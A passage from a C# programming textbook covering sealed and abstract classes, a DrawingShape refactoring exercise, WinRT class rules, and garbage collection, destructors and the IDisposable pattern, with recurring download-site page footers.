problem that you are modeling. To put it another way, unless you consciously
design a class with the intention of using it as a base class, it’s extremely
unlikely that it will function well as a base class. With C#, you can use the
sealed keyword to prevent a class from being used as a base class if you
decide that it should not be. For example:
Click here to view code image
sealed class Horse : GrazingMammal, ILandBound
{
...
}
If any class attempts to use Horse as a base class, a compile-time error
will be generated. Note that a sealed class cannot declare any virtual methods
and that an abstract class cannot be sealed.
Sealed methods
You can also use the sealed keyword to declare that an individual method in
an unsealed class is sealed. This means that a derived class cannot override
this method. You can seal only a method declared with the override keyword,
and you declare the method as sealed override. You can think of the
interface, virtual, override, and sealed keywords as follows:
An interface introduces the name of a method.
A virtual method is the first implementation of a method.
An override method is another implementation of a method.
A sealed method is the last implementation of a method.
Download from finelybook [email protected]
467
Implementing and using an abstract class
The following exercises use an abstract class to rationalize some of the code
that you developed in the previous exercise. The Square and Circle classes
contain a high proportion of duplicate code. It makes sense to factor this code
into an abstract class called DrawingShape because this will help to ease
maintenance of the Square and Circle classes in the future.
Create the DrawingShape abstract class
1. Return to the Drawing project in Visual Studio.
Note A finished working copy of the previous exercise is available
in the Drawing project, which is located in the \Microsoft
Press\VCSBS\Chapter 13\Drawing - Complete folder in your
Documents folder.
2. In Solution Explorer, click the Drawing project in the Drawing solution.
On the Project menu, click Add Class.
The Add New Item—Drawing dialog box opens.
3. In the Name box, type DrawingShape.cs, and then click Add.
Visual Studio creates the class and displays it in the Code and Text
Editor window.
4. In the DrawingShape.cs file, at the list at the top of the file, add the
following using directives:
Click here to view code image
using Windows.UI;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Shapes;
using Windows.UI.Xaml.Controls;
The purpose of this class is to contain the code common to the Circle
Download from finelybook [email protected]
468
and Square classes. A program should not be able to instantiate a
DrawingShape object directly.
5. Modify the definition of the DrawingShape class to declare it as
abstract, as shown here in bold:
Click here to view code image
abstract class DrawingShape
{
}
6. Add the following private variables shown in bold to the DrawingShape
class:
Click here to view code image
abstract class DrawingShape
{
protected int size;
protected int locX = 0, locY = 0;
protected Shape shape = null;
}
The Square and Circle classes both use the locX and locY fields to
specify the location of the object on the canvas so that you can move
these fields to the abstract class. Similarly, the Square and Circle classes
both use a field to indicate the size of the object when it was rendered;
although it has a different name in each class (sideLength and diameter),
semantically the field performs the same task in both classes. The name
size is a good abstraction of the purpose of this field.
Internally, the Square class uses a Rectangle object to render itself on
the canvas, and the Circle class uses an Ellipse object. Both of these
classes are part of a hierarchy based on the abstract Shape class in the
.NET Framework. The DrawingShape class uses a Shape field to
represent both of these types.
7. Add the following constructor to the DrawingShape class:
Click here to view code image
abstract class DrawingShape
{
...
public DrawingShape(int size)
Download from finelybook [email protected]
469
{
this.size = size;
}
}
This code initializes the size field in the DrawingShape object.
8. Add the SetLocation and SetColor methods to the DrawingShape class,
as shown in bold in the code that follows. These methods provide
implementations that are inherited by all classes that derive from the
DrawingShape class. Notice that they are not marked as virtual, and a
derived class is not expected to override them. Also, the DrawingShape
class is not declared as implementing the IDraw or IColor interfaces
(interface implementation is a feature of the Square and Circle classes
and not this abstract class), so these methods are simply declared as
public.
Click here to view code image
abstract class DrawingShape
{
...
public void SetLocation(int xCoord, int yCoord)
{
this.locX = xCoord;
this.locY = yCoord;
}
public void SetColor(Color color)
{
if (this.shape != null)
{
SolidColorBrush brush = new SolidColorBrush(color);
this.shape.Fill = brush;
}
}
}
9. Add the Draw method to the DrawingShape class. Unlike the previous
methods, this method is declared as virtual, and any derived classes are
expected to override it to extend the functionality. The code in this
method verifies that the shape field is not null and then draws it on the
canvas. The classes that inherit this method must provide their own code
to instantiate the shape object. (Remember that the Square class creates
a Rectangle object and the Circle class creates an Ellipse object.)
Download from finelybook [email protected]
470
Click here to view code image
abstract class DrawingShape
{
...
public virtual void Draw(Canvas canvas)
{
if (this.shape == null)
{
throw new InvalidOperationException("Shape is null
");
}
this.shape.Height = this.size;
this.shape.Width = this.size;
Canvas.SetTop(this.shape, this.locY);
Canvas.SetLeft(this.shape, this.locX);
canvas.Children.Add(this.shape);
}
}
You have now completed the DrawingShape abstract class. The next steps
are to change the Square and Circle classes so that they inherit from this class
and then to remove the duplicated code from the Square and Circle classes.
Modify the Square and Circle classes to inherit from the DrawingShape
class
1. Display the code for the Square class in the Code and Text Editor
window.
2. Modify the definition of the Square class so that it inherits from the
DrawingShape class in addition to implementing the IDraw and IColor
interfaces.
Click here to view code image
class Square : DrawingShape, IDraw, IColor
{
...
}
Notice that you must specify the class that the Square class inherits from
before any interfaces that it implements.
3. In the Square class, remove the definitions of the sideLength, rect, locX,
and locY fields. These fields are no longer necessary because they are
Download from finelybook [email protected]
471
now provided by the DrawingShape class.
4. Replace the existing constructor with the following code shown in bold,
which calls the constructor in the base class:
Click here to view code image
class Square : DrawingShape, IDraw, IColor
{
public Square(int sideLength)
:base(sideLength)
{
}
...
}
Notice that the body of this constructor is empty because the base class
constructor performs all the initialization required.
5. Remove the IDraw.SetLocation and IColor.SetColor methods from the
Square class. The DrawingShape class provides the implementation of
these methods.
6. Modify the definition of the Draw method. Declare it with public
override and also remove the reference to the IDraw interface. Again,
the DrawingShape class already provides the base functionality for this
method, but you will extend it with the specific code required by the
Square class.
Click here to view code image
public override void Draw(Canvas canvas)
{
...
}
7. Replace the body of the Draw method with the code shown here in bold:
Click here to view code image
public override void Draw(Canvas canvas)
{
if (this.shape != null)
{
canvas.Children.Remove(this.shape);
}
else
{
Download from finelybook [email protected]
472
this.shape = new Rectangle();
}
base.Draw(canvas);
}
These statements instantiate the shape field inherited from the
DrawingShape class as a new instance of the Rectangle class if it has not
already been instantiated. They then call the Draw method in the
DrawingShape class.
8. Repeat steps 2 through 7 for the Circle class, except that the constructor
should be called Circle with a parameter called diameter, and in the
Draw method, you should instantiate the shape field as a new Ellipse
object. The complete code for the Circle class should look like this:
Click here to view code image
class Circle : DrawingShape, IDraw, IColor
{
public Circle(int diameter)
:base(diameter)
{
}
public override void Draw(Canvas canvas)
{
if (this.shape != null)
{
canvas.Children.Remove(this.shape);
}
else
{
this.shape = new Ellipse();
}
base.Draw(canvas);
}
}
9. On the Debug menu, click Start Debugging. When the Drawing Pad
window opens, verify that Square objects appear when you left-click in
the window, and Circle objects appear when you right-click in the
window. The application should behave the same as before.
10. Return to Visual Studio and stop debugging.
Download from finelybook [email protected]
473
Compatibility with the Windows Runtime revisited
Chapter 9, “Creating value types with enumerations and structures,”
describes how the Windows platform from Windows 8 onward
implements the Windows Runtime (WinRT) as a layer on top of the
native Windows APIs, providing a simplified programming interface
for developers building unmanaged applications. (An unmanaged
application is an application that does not run by using the .NET
Framework; you build them by using a language such as C++ rather
than C#). Managed applications use the common language runtime
(CLR) to run .NET Framework applications. The .NET Framework
provides an extensive set of libraries and features. On Windows 7 and
earlier versions, the CLR implements these features by using the native
Windows APIs. If you are building desktop or enterprise applications
and services on Windows 10, this same feature set is still available
(although the .NET Framework itself has been upgraded to version
4.6.1), and any C# applications that work on Windows 7 should run
unchanged on Windows 10.
On Windows 10, UWP apps always run by using WinRT. This
means that if you are building UWP apps by using a managed language
such as C#, the CLR actually invokes WinRT rather than the native
Windows APIs. Microsoft has provided a mapping layer between the
CLR and WinRT that can transparently translate requests to create
objects and invoke methods that are made to the .NET Framework into
the equivalent object requests and method calls in WinRT. For example,
when you create a .NET Framework Int32 value (an int in C#), this
code is translated to create a value using the equivalent WinRT data
type. However, although the CLR and WinRT have a large amount of
overlapping functionality, not all the features of the .NET Framework
4.6 have corresponding features in WinRT. Consequently, UWP apps
have access to only a reduced subset of the types and methods provided
by the .NET Framework 4.6. (IntelliSense in Visual Studio 2017
automatically shows the restricted view of available features when you
use C# to build UWP apps, omitting the types and methods not
available through WinRT.)
On the other hand, WinRT provides a significant set of features and
Download from finelybook [email protected]
474
types that have no direct equivalent in the .NET Framework or that
operate in a significantly different way to the corresponding features in
the .NET Framework, and so cannot easily be translated. WinRT makes
these features available to the CLR through a mapping layer that makes
them look like .NET Framework types and methods, and you can
invoke them directly from managed code.
So, integration implemented by the CLR and WinRT enables the
CLR to transparently use WinRT types, but it also supports
interoperability in the reverse direction: you can define types by using
managed code and make them available to unmanaged applications as
long as these types conform to the expectations of WinRT. Chapter 9
highlights the requirements of structs in this respect (instance and static
methods in structs are not available through WinRT, and private fields
are unsupported). If you are building classes with the intention that they
be consumed by unmanaged applications through WinRT, your classes
must follow these rules:
Any public fields, and the parameters and return values of any
public methods, must be WinRT types or .NET Framework types
that can be transparently translated by WinRT into WinRT types.
Examples of supported .NET Framework types include
conforming value types (such as structs and enums) and those
corresponding to the C# primitives (int, long, float, double, string,
and so on). Private fields are supported in classes, and they can be
of any type available in the .NET Framework; they do not have to
conform to WinRT.
Classes cannot override methods of System.Object other than
ToString, and they cannot declare protected constructors.
The namespace in which a class is defined must be the same as
the name of the assembly implementing the class. Additionally,
the namespace name (and therefore the assembly name) must not
begin with “Windows.”
You cannot inherit from managed types in unmanaged
applications through WinRT. Therefore, all public classes must
be sealed. If you need to implement polymorphism, you can
create a public interface and implement that interface on the
classes that must be polymorphic.
Download from finelybook [email protected]
475
You can throw any exception type that is included in the subset of
the .NET Framework available to UWP apps; you cannot create
your own custom exception classes. If your code throws an
unhandled exception when called from an unmanaged
application, WinRT raises an equivalent exception in the
unmanaged code.
WinRT has other requirements concerning features of C# code
covered later in this book. These requirements will be highlighted as
each feature is described.
Summary
In this chapter, you saw how to define and implement interfaces and abstract
classes. The following table summarizes the various valid (yes), and invalid
(no) keyword combinations when defining methods for interfaces, classes,
and structs.
Keyword
Interface
Abstract class
Class
Sealed class
Structure
Abstract
No
Yes
No
No
No
New
Yes1
Yes
Yes
Yes
No2
Override
No
Yes
Yes
Yes
No3
Private
No
Yes
Yes
Yes
Yes
Protected
No
Yes
Yes
Yes
No4
Public
No
Yes
Yes
Yes
Yes
Sealed
No
Yes
Yes
Yes
No
Virtual
No
Yes
Yes
No
No
1 An interface can extend another interface and introduce a new method with
the same signature.
2 Structures do not support inheritance, so they cannot hide methods.
3 Structures do not support inheritance, so they cannot override methods.
4 Structures do not support inheritance; a structure is implicitly sealed and
Download from finelybook [email protected]
476
cannot be derived from.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 14.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare an interface
Use the interface keyword. For example,
interface IDemo
Click here to view code image
{ string GetName();
string GetDescription();
}
Implement an interface
Declare a class by using the same syntax as
class inheritance, and then implement all the
member functions of the interface. For example:
Click here to view code image
class Test : IDemo
{
public string IDemo.GetName()
{
...
}
public string IDemo.GetDescription()
{
...
}
}
Create an abstract class
that can be used only as a
base class, containing
abstract methods
Declare the class by using the abstract keyword.
For each abstract method, declare the method
with the abstract keyword and without a method
body. For example:
Click here to view code image
abstract class GrazingMammal
Download from finelybook [email protected]
477
{
abstract void DigestGrass();
...
}
Create a sealed class that
cannot be used as a base
class
Declare the class by using the sealed keyword.
For example:
Click here to view code image
sealed class Horse
{
...
}
Download from finelybook [email protected]
478
CHAPTER 14
Using garbage collection and
resource management
After completing this chapter, you will be able to:
Manage system resources by using garbage collection.
Write code that runs when an object is destroyed.
Release a resource at a known point in time in an exception-safe
manner by writing a try/finally statement.
Release a resource at a known point in time in an exception-safe
manner by writing a using statement.
Implement the IDisposable interface to support exception-safe disposal
in a class.
You have seen in earlier chapters how to create variables and objects, and
you should understand how memory is allocated when you create variables
and objects. (In case you don’t remember, value types are created on the
stack, and reference types are allocated memory from the heap.) Computers
do not have infinite amounts of memory, so memory must be reclaimed when
a variable or an object no longer needs it. Value types are destroyed and their
memory reclaimed when they go out of scope. That’s the easy bit. How about
reference types? You create an object by using the new keyword, but how
and when is an object destroyed? That’s what this chapter is all about.
Download from finelybook [email protected]
479
The life and times of an object
First, let’s recap what happens when you create an object.
You create an object by using the new operator. The following example
creates a new instance of the Square class that is discussed in Chapter 13,
“Creating interfaces and defining abstract classes.”
Click here to view code image
int sizeOfSquare = 99;
Square mySquare = new Square(sizeOfSquare); // Square is a reference
type
From your point of view, the new operation is a single step, but
underneath, object creation is really a two-phase process:
1. The new operation allocates a chunk of raw memory from the heap. You
have no control over this phase of an object’s creation.
2. The new operation converts the chunk of raw memory to an object; it
has to initialize the object. You can control this phase by using a
constructor.
Note If you are a C++ programmer, you should note that in C#, you
cannot overload the new operation to control allocation.
After you create an object, you can access its members by using the dot
operator (.). For example, the Square class includes a method named Draw
that you can call:
mySquare.Draw();
Note This code is based on the version of the Square class that inherits
Download from finelybook [email protected]
480
from the DrawingShape abstract class and does not implement the
IDraw interface explicitly. For more information, refer to Chapter 13.
When the mySquare variable goes out of scope, the Square object is no
longer being actively referenced. The object can then be destroyed, and the
memory that it is using can be reclaimed. (This might not happen
immediately, however, as you will see later.) Like object creation, object
destruction is a two-phase process. The two phases of destruction exactly
mirror the two phases of creation:
1. The common language runtime (CLR) must perform some tidying up.
You can control this by writing a destructor.
2. The CLR must return the memory previously belonging to the object
back to the heap; the memory that the object lived in must be
deallocated. You have no control over this phase.
The process of destroying an object and returning memory to the heap is
known as garbage collection.
Note If you program in C++, keep in mind that C# does not have a
delete operator. The CLR controls when an object is destroyed.
Writing destructors
You can use a destructor to perform any tidying up that’s required when an
object is garbage collected. The CLR will automatically clear up any
managed resources that an object uses, so in many of these cases, writing a
destructor is unnecessary. However, if a managed resource is large (such as a
multidimensional array), it might make sense to make this resource available
for immediate disposal by setting any references that the object has to this
resource to null. Additionally, if an object references an unmanaged resource,
either directly or indirectly, a destructor can prove useful.
Download from finelybook [email protected]
481
Note Indirect unmanaged resources are reasonably common. Examples
include file streams, network connections, database connections, and
other resources managed by Windows. If you open a file in a method,
for example, you might want to add a destructor that closes the file
when the object is destroyed. However, there might be a better and
timelier way to close the file depending on the structure of the code in
your class. (See the discussion of the using statement later in this
chapter.)
A destructor is a special method, a little like a constructor, except that the
CLR calls it after the reference to an object has disappeared.
Note Don’t confuse destructors with deconstructors (described in
Chapter 7, “Creating and managing classes and objects”), which you
can implement to retrieve the internal fields of an object.
The syntax for writing a destructor is a tilde (~) followed by the name of
the class. For example, here’s a simple class that opens a file for reading in its
constructor and closes the file in its destructor. (Note that this is simply an
example, and I do not recommend that you always follow this pattern for
opening and closing files.)
Click here to view code image
class FileProcessor
{
FileStream file = null;
public FileProcessor(string fileName)
{
this.file = File.OpenRead(fileName); // open file for reading
}
Download from finelybook [email protected]
482
~FileProcessor()
{
this.file.Close(); // close file
}
}
There are some very important restrictions that apply to destructors:
Destructors apply only to reference types; you cannot declare a
destructor in a value type, such as a struct.
Click here to view code image
struct MyStruct
{
~MyStruct() { ... } // compile-time error
}
You cannot specify an access modifier (such as public) for a destructor.
You never call the destructor in your own code; part of the CLR called
the garbage collector does this for you.
Click here to view code image
public ~FileProcessor() { ... } // compile-time error
A destructor cannot take any parameters. Again, this is because you
never call the destructor yourself.
Click here to view code image
~FileProcessor(int parameter) { ... } // compile-time error
Internally, the C# compiler automatically translates a destructor into an
override of the Object.Finalize method. The compiler converts this
destructor:
Click here to view code image
class FileProcessor
{
~FileProcessor()
{
// your code goes here
}
}
into this:
Click here to view code image
Download from finelybook [email protected]
483
class FileProcessor
{
protected override void Finalize()
{
try
{
// your code goes here
}
finally
{
base.Finalize();
}
}
}
The compiler-generated Finalize method contains the destructor body
within a try block, followed by a finally block that calls the Finalize method
in the base class. (The try and finally keywords are described in Chapter 6,
“Managing errors and exceptions.”) This ensures that a destructor always
calls its base-class destructor, even if an exception occurs during your
destructor code.
It’s important to understand that only the compiler can make this
translation. You can’t write your own method to override Finalize, and you
can’t call Finalize yourself.
Why use the garbage collector?
You can never destroy an object yourself by using C# code. There just isn’t
any syntax to do it. Instead, the CLR does it for you at a time of its own
choosing. Also, keep in mind that you can make more than one reference
variable refer to the same object. In the following code example, the variables
myFp and referenceToMyFp point to the same FileProcessor object:
Click here to view code image
FileProcessor myFp = new FileProcessor();
FileProcessor referenceToMyFp = myFp;
How many references can you create to an object? As many as you want!
But this lack of restriction has an impact on the lifetime of an object. The
CLR has to keep track of all these references. If the variable myFp disappears
(by going out of scope), other variables (such as referenceToMyFp) might
still exist, and the resources used by the FileProcessor object cannot be
Download from finelybook [email protected]
484
reclaimed (the file should not be closed). So the lifetime of an object cannot
be tied to a particular reference variable. An object can be destroyed and its
memory made available for reuse only when all the references to it have
disappeared.
You can see that managing object lifetimes is complex, which is why the
designers of C# decided to prevent your code from taking on this
responsibility. If it were your responsibility to destroy objects, sooner or later
one of the following situations would arise:
You’d forget to destroy the object. This would mean that the object’s
destructor (if it had one) would not be run, tidying up would not occur,
and memory would not be returned to the heap. You could quite easily
run out of memory.
You’d try to destroy an active object and risk the possibility that one or
more variables hold a reference to a destroyed object, which is known
as a dangling reference. A dangling reference refers either to unused
memory or possibly to a completely different object that now happens
to occupy the same piece of memory. Either way, the outcome of using
a dangling reference would be undefined at best or a security risk at
worst. All bets would be off.
You’d try to destroy the same object more than once. This might or
might not be disastrous, depending on the code in the destructor.
These problems are unacceptable in a language like C#, which places
robustness and security high on its list of design goals. Instead, the garbage
collector destroys objects for you. The garbage collector makes the following
guarantees:
Every object will be destroyed, and its destructor will be run. When a
program ends, all outstanding objects will be destroyed.
Every object will be destroyed exactly once.
Every object will be destroyed only when it becomes unreachable—
that is, when there are no references to the object in the process
running your application.
These guarantees are tremendously useful, and they free you, the
programmer, from tedious housekeeping chores that are easy to get wrong.
They afford you the luxury to concentrate on the logic of the program itself
Download from finelybook [email protected]
485
and be more productive.
When does garbage collection occur? This might seem like a strange
question. After all, surely garbage collection occurs when an object is no
longer needed. Well, it does, but not necessarily immediately. Garbage
collection can be an expensive process, so the CLR collects garbage only
when it needs to (when available memory is starting to run low, or the size of
the heap has exceeded the system-defined threshold, for example), and then it
collects as much as it can. Performing a few large sweeps of memory is more
efficient than performing lots of little dustings.
Note You can invoke the garbage collector in a program by calling the
static method Collect of the GC class located in the System namespace.
However, except in a few cases, this is not recommended. The
GC.Collect method starts the garbage collector, but the process runs
asynchronously—the GC.Collect method does not wait for garbage
collection to be complete before it returns, so you still don’t know
whether your objects have been destroyed. Let the CLR decide when it
is best to collect garbage.
One feature of the garbage collector is that you don’t know, and should
not rely upon, the order in which objects will be destroyed. The final point to
understand is arguably the most important: destructors do not run until
objects are garbage collected. If you write a destructor, you know it will be
executed, but you just don’t know when. Consequently, you should never
write code that depends on destructors running in a particular sequence or at a
specific point in your application.
How does the garbage collector work?
The garbage collector runs in its own thread and can execute only at certain
times—typically when your application reaches the end of a method. While it
runs, other threads running in your application will temporarily halt because
the garbage collector might need to move objects around and update object
Download from finelybook [email protected]
486
references, and it cannot do this while objects are in use.
Note A thread is a separate path of execution in an application.
Windows uses threads to enable an application to perform multiple
operations concurrently.
The garbage collector is a complex piece of software that is self-tuning
and implements some optimizations to try to balance the need to keep
memory available with the requirement to maintain the performance of the
application. The details of the internal algorithms and structures that the
garbage collector uses are beyond the scope of this book (and Microsoft
continually refines the way in which the garbage collector performs its work),
but at a high level, the steps that the garbage collector takes are as follows:
1. It builds a map of all reachable objects. It does this by repeatedly
following reference fields inside objects. The garbage collector builds
this map very carefully and ensures that circular references do not cause
infinite recursion. Any object not in this map is deemed to be
unreachable.
2. It checks whether any of the unreachable objects has a destructor that
needs to be run (a process called finalization). Any unreachable object
that requires finalization is placed in a special queue called the
freachable queue (pronounced “F-reachable”).
3. It deallocates the remaining unreachable objects (those that don’t require
finalization) by moving the reachable objects down the heap, thus
defragmenting the heap and freeing memory at its top. When the
garbage collector moves a reachable object, it also updates any
references to the object.
4. At this point, it allows other threads to resume.
5. It finalizes the unreachable objects that require finalization (now in the
freachable queue) by running the Finalize methods on its own thread.
Download from finelybook [email protected]
487
Recommendations
Writing classes that contain destructors adds complexity to your code and the
garbage collection process and makes your program run more slowly. If your
program does not contain any destructors, the garbage collector does not need
to place unreachable objects in the freachable queue and finalize them.
Clearly, not doing something is faster than doing it. Therefore, try to avoid
using destructors except when you really need them—use them only to
reclaim unmanaged resources. (You can consider a using statement instead,
as will be described later in this chapter.)
You need to be very careful when you write a destructor. In particular, be
aware that if your destructor calls other objects, those other objects might
have already had their destructor called by the garbage collector. Remember
that the order of finalization is not guaranteed. Therefore, ensure that
destructors do not depend on one another or overlap one another—don’t have
two destructors that try to release the same resource, for example.
Resource management
Sometimes it’s inadvisable to release a resource in a destructor; some
resources are just too valuable to lie around waiting for an arbitrary length of
time until the garbage collector actually releases them. Scarce resources such
as memory, database connections, or file handles need to be released, and
they need to be released as soon as possible. In these situations, your only
option is to release the resource yourself. You can achieve this by creating a
disposal method—a method that explicitly disposes of a resource. If a class
has a disposal method, you can call it and control when the resource is
released.
Note The term disposal method refers to the purpose of the method
rather than its name. A disposal method can be named using any valid
C# identifier.
Download from finelybook [email protected]
488
Disposal methods
An example of a class that implements a disposal method is the TextReader
class from the System.IO namespace. This class provides a mechanism to
read characters from a sequential stream of input. The TextReader class
contains a virtual method named Close, which closes the stream. The
StreamReader class (which reads characters from a stream, such as an open
file) and the StringReader class (which reads characters from a string) both
derive from TextReader, and both override the Close method. Here’s an
example that reads lines of text from a file by using the StreamReader class
and then displays them on the screen:
Click here to view code image
TextReader reader = new StreamReader(filename);
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
reader.Close();
The ReadLine method reads the next line of text from the stream into a
string. The ReadLine method returns null if there is nothing left in the stream.
It’s important to call Close when you have finished with reader to release the
file handle and associated resources. However, there is a problem with this
example: it’s not safe from exceptions. If the call to ReadLine or WriteLine
throws an exception, the call to Close will not happen; it will be bypassed. If
this happens often enough, you will run out of file handles and be unable to
open any more files.
Exception-safe disposal
One way to ensure that a disposal method (such as Close) is always called,
regardless of whether there is an exception, is to call the disposal method
within a finally block. Here’s the preceding example coded by using this
technique:
Click here to view code image
TextReader reader = new StreamReader(filename);
try
{
Download from finelybook [email protected]
489
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
}
finally
{
reader.Close();
}
Using a finally block like this works, but it has several drawbacks that
make it a less-than-ideal solution:
It quickly becomes unwieldy if you have to dispose of more than one
resource. (You end up with nested try and finally blocks.)
In some cases, you might need to modify the code to make it fit this
idiom. (For example, you might need to reorder the declaration of the
resource reference, remember to initialize the reference to null, and
remember to check that the reference isn’t null in the finally block.)
It fails to create an abstraction of the solution. This means that the
solution is hard to understand and you must repeat the code everywhere
you need this functionality.
The reference to the resource remains in scope after the finally block.
This means that you can accidentally try to use the resource after it has
been released.
The using statement is designed to solve all these problems.
The using statement and the IDisposable interface
The using statement provides a clean mechanism for controlling the lifetimes
of resources. You can create an object, and this object will be destroyed when
the using statement block finishes.
Important Do not confuse the using statement shown in this section
with the using directive that brings a namespace into scope. It is
unfortunate that the same keyword has two different meanings.
Download from finelybook [email protected]
490
The syntax for a using statement is as follows:
Click here to view code image
using ( type variable = initialization )
{
StatementBlock
}
Here is the best way to ensure that your code always calls Close on a
TextReader:
Click here to view code image
using (TextReader reader = new StreamReader(filename))
{
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
}
This using statement is equivalent to the following transformation:
Click here to view code image
{
TextReader reader = new StreamReader(filename);
try
{
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
}
finally
{
if (reader != null)
{
((IDisposable)reader).Dispose();
}
}
}
Download from finelybook [email protected]
491
Note The using statement introduces its own block for scoping
purposes. This arrangement means that the variable you declare in a
using statement automatically goes out of scope at the end of the
embedded statement and you cannot accidentally attempt to access a
disposed resource.
The variable you declare in a using statement must be of a type that
implements the IDisposable interface. The IDisposable interface lives in the
System namespace and contains just one method, named Dispose:
Click here to view code image
namespace System
{
interface IDisposable
{
void Dispose();
}
}
The purpose of the Dispose method is to free any resources used by an
object. It just so happens that the StreamReader class implements the
IDisposable interface, and its Dispose method calls Close to close the stream.
You can employ a using statement as a clean, exception-safe, and robust way
to ensure that a resource is always released. This approach solves all the
problems that existed in the manual try/finally solution. You now have a
solution that does the following:
Scales well if you need to dispose of multiple resources.
Doesn’t distort the logic of the program code.
Abstracts away the problem and avoids repetition.
Is robust. You can’t accidentally reference the variable declared within
the using statement (in this case, reader) after the using statement has
ended because it’s not in scope anymore—you’ll get a compile-time
error.
Download from finelybook [email protected]
492
Calling the Dispose method from a destructor
When writing your own classes, should you write a destructor or implement
the IDisposable interface so that instances of your class can be managed by a
using statement? A call to a destructor will happen, but you just don’t know
when. On the other hand, you know exactly when a call to the Dispose
method happens, but you just can’t be sure that it will actually happen
because it relies on the programmer who is using your classes to remember to
write a using statement. However, it is possible to ensure that the Dispose
method always runs by calling it from the destructor. This acts as a useful
backup. You might forget to call the Dispose method, but at least you can be
sure that it will be called, even if it’s only when the program shuts down. You
will investigate this feature in detail in the exercises at the end of the chapter,
but here’s an example of how you might implement the IDisposable
interface:
Click here to view code image
class Example : IDisposable
{
private Resource scarce; // scarce resource to manage and
dispose
private bool disposed = false; // flag to indicate whether the
resource
// has already been disposed
...
~Example()
{
this.Dispose(false);
}
public virtual void Dispose()
{
this.Dispose(true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
{
if (!this.disposed)
{
if (disposing)
{
// release large, managed resource here
...
}
Download from finelybook [email protected]
493
// release unmanaged resources here
...
this.disposed = true;
}
}
public void SomeBehavior() // example method
{
checkIfDisposed();
...
}
...
private void checkIfDisposed()
{
if (this.disposed)
{
throw new ObjectDisposedException("Example: object has
been disposed");
}
}
}
Notice the following features of the Example class:
The class implements the IDisposable interface.
The public Dispose method can be called at any time by your
application code.
The public Dispose method calls the protected and overloaded version
of the Dispose method that takes a Boolean parameter, passing the
value true as the argument. This method actually performs the resource
disposal.
The destructor calls the protected and overloaded version of the
Dispose method that takes a Boolean parameter, passing the value false
as the argument. The destructor is called only by the garbage collector
when your object is being finalized.
You can call the protected Dispose method safely multiple times. The
variable disposed indicates whether the method has already been run
and is a safety feature to prevent the method from attempting to
dispose of the resources multiple times if it is called concurrently.
(Your application might call Dispose, but before the method completes,
your object might be subject to garbage collection and the Dispose
Download from finelybook [email protected]
494
method run again by the CLR from the destructor.) The resources are
released only the first time the method runs.
The protected Dispose method supports disposal of managed resources
(such as a large array) and unmanaged resources (such as a file handle).
If the disposing parameter is true, this method must have been called
from the public Dispose method. In this case, the managed resources
and unmanaged resources are all released. If the disposing parameter is
false, this method must have been called from the destructor, and the
garbage collector is finalizing the object. In this case, it is not
necessary (or exception-safe) to release the managed resources because
they will be, or might already have been, handled by the garbage
collector, so only the unmanaged resources are released.
The public Dispose method calls the static GC.SuppressFinalize
method. This method stops the garbage collector from calling the
destructor on this object because the object has already been finalized.
All the regular methods of the class (such as SomeBehavior) check to
see whether the object has already been discarded. If it has, they throw
an exception.
Implementing exception-safe disposal
In the following set of exercises, you will examine how the using statement
helps to ensure that resources used by objects in your applications can be
released promptly, even if an exception occurs in your application code.
Initially, you will implement a simple class that implements a destructor and
examine when this destructor is invoked by the garbage collector.
Note The Calculator class created in these exercises is intended only to
illustrate the essential principles of garbage collection. The class does
not actually consume any significant managed or unmanaged resources.
You would not normally create a destructor or implement the
IDisposable interface for such a simple class as this.
Download from finelybook [email protected]
495
Create a simple class that uses a destructor
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
The New Project dialog box opens.
3. In the New Project dialog box, in the left pane, click Visual C#. In the
middle pane, select the Console App (.NET Framework) template. In the
Name box near the bottom of the dialog box, type
GarbageCollectionDemo. In the Location field, specify the folder
Microsoft Press\VCSBS\Chapter 14 in your Documents folder, and then
click OK.
Tip You can use the Browse button adjacent to the Location field
to navigate to the Microsoft Press\VCSBS\Chapter 14 folder
instead of typing the path manually.
Visual Studio creates a new console application and displays the
Program.cs file in the Code and Text Editor window.
4. On the Project menu, click Add Class.
The Add New Item – GarbageCollectionDemo dialog box opens.
5. In the Add New Item – GarbageCollectionDemo dialog box, ensure that
the Class template is selected. In the Name box, type Calculator.cs, and
then click Add.
The Calculator class is created and displayed in the Code and Text
Editor window.
6. Add the following public Divide method (shown in bold) to the
Calculator class:
Click here to view code image
Download from finelybook [email protected]
496
class Calculator
{
public int Divide(int first, int second)
{
return first / second;
}
}
This is a very straightforward method that divides the first parameter by
the second and returns the result. It is provided just to add a bit of
functionality that can be called by an application.
7. Above the Divide method, add the public constructor shown in bold in
the code that follows:
Click here to view code image
class Calculator
{
public Calculator()
{
Console.WriteLine("Calculator being created");
}
...
}
The purpose of this constructor is to enable you to verify that a
Calculator object has been successfully created.
8. Add the destructor shown in bold in the following code, after the
constructor:
Click here to view code image
class Calculator
{
...
~Calculator()
{
Console.WriteLine("Calculator being finalized");
}
...
}
This destructor simply displays a message so that you can see when the
garbage collector runs and finalizes instances of this class. When writing
classes for real-world applications, you would not normally output text
in a destructor.
Download from finelybook [email protected]
497
9. Display the Program.cs file in the Code and Text Editor window.
10. In the Program class, add the following statements shown in bold to the
Main method:
Click here to view code image
static void Main(string[] args)
{
Calculator calculator = new Calculator();
Console.WriteLine($"120 / 15 = {calculator.Divide(120,
15)}");
Console.WriteLine("Program finishing");
}
This code creates a Calculator object, calls the Divide method of this
object (and displays the result), and then outputs a message as the
program finishes.
11. On the Debug menu, click Start Without Debugging. Verify that the
program displays the following series of messages:
Click here to view code image
Calculator being created
120 / 15 = 8
Program finishing
Calculator being finalized
Notice that the finalizer for the Calculator object runs only when the
application is about to finish, after the Main method has completed.
12. In the console window, press the Enter key and return to Visual Studio
2017.
The CLR guarantees that all objects created by your applications will be
subject to garbage collection, but you cannot always be sure when this will
happen. In the exercise, the program was very short-lived, and the Calculator
object was finalized when the CLR tidied up as the program finished.
However, you might also find that this is the case in more substantial
